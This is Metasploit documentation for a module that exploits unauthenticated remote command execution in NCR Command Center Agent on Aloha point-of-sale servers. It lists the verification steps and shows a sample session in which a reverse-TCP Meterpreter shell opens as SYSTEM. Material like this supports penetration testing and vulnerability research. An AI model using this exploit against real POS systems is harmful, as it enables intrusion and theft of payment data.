Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md
25416 views

Vulnerable Application

CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."

Successfully tested against NCR Command Center Agent 16.2.1.1

Install

The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:

https://web.archive.org/web/20210129020048/https://rdf2.alohaenterprise.com/client/CMCInst.zip

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use windows/misc/ncr_cmcagent_rce

  4. Do: set rhosts [ip]

  5. Do: set lhost [ip]

  6. Do: run

  7. You should get a shell.

Options

Scenarios

msf > use windows/misc/ncr_cmcagent_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/misc/ncr_cmcagent_rce) > set LHOST 192.168.2.107
LHOST => 192.168.2.107
msf exploit(windows/misc/ncr_cmcagent_rce) > set RHOSTS 192.168.2.106
RHOSTS => 192.168.2.106
msf exploit(windows/misc/ncr_cmcagent_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.107:4444 
[*] 192.168.2.106:8089 - Generating payload
[*] 192.168.2.106:8089 - Check your shell
[*] Sending stage (177734 bytes) to 192.168.2.106
[*] Meterpreter session 1 opened (192.168.2.107:4444 -> 192.168.2.106:49849) at 2025-10-23 05:38:45 -0400

meterpreter > shell
Process 5188 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.4529]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system